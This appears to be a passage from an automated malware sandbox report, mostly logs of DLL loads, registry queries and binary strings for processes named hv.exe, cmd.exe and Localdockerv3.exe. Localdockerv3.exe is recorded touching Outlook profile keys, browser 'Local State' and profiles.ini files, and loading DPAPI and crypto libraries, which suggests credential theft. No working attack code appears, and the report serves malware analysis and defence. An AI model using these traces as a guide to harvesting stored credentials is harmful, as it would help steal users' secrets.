                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: oledlg.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: mscms.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: coloradapterclient.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: oledlg.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: mscms.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: coloradapterclient.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32Jump to behavior
                  Source: tsmbkpqw.4.drLNK file: ..\..\Roaming\Chromewizard\hv.exe
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeWindow found: window name: TMainFormJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dll
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: 9mauyKC3JW.exeStatic file information: File size 9118184 > 1048576
                  Source: Binary string: BC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\41\89\Local State source: Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: Localdockerv3.exe, 00000008.00000003.1971403578.0000000000B26000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: [\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974363760.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: j\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.iniiiNp source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: hv.exe, 00000002.00000002.1491958833.000000000CD00000.00000004.00000800.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1475378967.0000000004002000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776635840.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1777986969.0000000005A50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: H\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.iniAC source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdb source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1981844538.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ls\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: Localdockerv3.exe, 00000008.00000003.2071965811.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State-;}P source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: "winload_prod.pdb3 source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.inid~} source: Localdockerv3.exe, 00000008.00000003.1997630296.0000000000A9D000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: CC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\crosoft.WindowsAlarms source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: Localdockerv3.exe, 00000008.00000003.2071965811.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2160661904.0000000000A93000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2113703918.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: hv.exe, 00000002.00000002.1491958833.000000000CD00000.00000004.00000800.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1475378967.0000000004002000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776635840.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1777986969.0000000005A50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: Localdockerv3.exe, 00000008.00000002.2164083320.0000000004716000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168990180.0000000006F13000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167276865.0000000005F15000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2164818824.0000000004D1A000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167476156.000000000611F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2163833523.0000000004517000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168743092.0000000006D14000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165292012.0000000005116000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165803793.000000000551C000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2166502980.0000000005912000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168051496.0000000006719000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2162708356.0000000003D1F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2169225892.0000000007118000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: D:\a\pdfium-binaries\pdfium-binaries\pdfium\out\pdfium.dll.pdb source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000003345000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1460868437.000000000D1E2000.00000004.00000001.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmp, hv.exe, 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\cs source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984341429.000000000852C000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbloaded source: Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State^;:}P source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ]C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini^ source: Localdockerv3.exe, 00000008.00000003.1984341429.000000000852C000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
